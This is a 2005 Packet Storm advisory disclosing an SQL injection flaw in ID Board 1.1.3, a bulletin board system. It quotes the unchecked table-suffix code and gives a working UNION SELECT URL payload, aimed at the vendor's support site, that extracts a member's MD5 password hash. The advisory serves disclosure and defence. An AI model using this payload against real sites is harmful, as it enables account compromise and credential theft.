idboard113SQL.txt

2005-07-12T00:00:00
ID PACKETSTORM:38572
Type packetstorm
Reporter defa
Modified 2005-07-12T00:00:00

Description

                                        
                                            `============================================================  
Title: ID Board 1.1.3 SQL Injection Vulnerability  
Vulnerability Discovery: me, myself and I  
Date: 09/07/2005  
Severity: Remote users can fetch MD5 Passwd Hash.  
Affected version: 1.1.3 free (only one tested)  
Vendor: http://www.id-team.com/  
============================================================  
  
============================================================  
  
* Summary *  
  
ID Board is a little Bulletin Board system. It is offered in three   
versions, I could only test the free one. Board is commonly used on   
german speaking websites.  
  
-------------------------------------------------------------  
  
* Problem Description *  
-----------------------  
  
The bug reside in sql.cls.php - the tbl_suff variable isn't checked.  
  
Vulnerable Code:  
  
if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) &&  
!ereg("AS", $from))  
$from = "[tbl_prev]".$from."[tbl_suff]";  
  
  
* Example * (Account required)  
------------------------------  
  
http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1%   
20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%   
20WHERE%20mem_id=1/*&0&warn=0  
  
-------------------------------------------------------------  
  
* Fix *  
  
Contact the Vendor.  
  
-------------------------------------------------------------  
  
* References *  
  
This mail.  
-------------------------------------------------------------  
  
* Credits *  
  
no credit.  
-------------------------------------------------------------  
  
regards  
defa  
  
--  
Don't eat yellow snow!  
  
`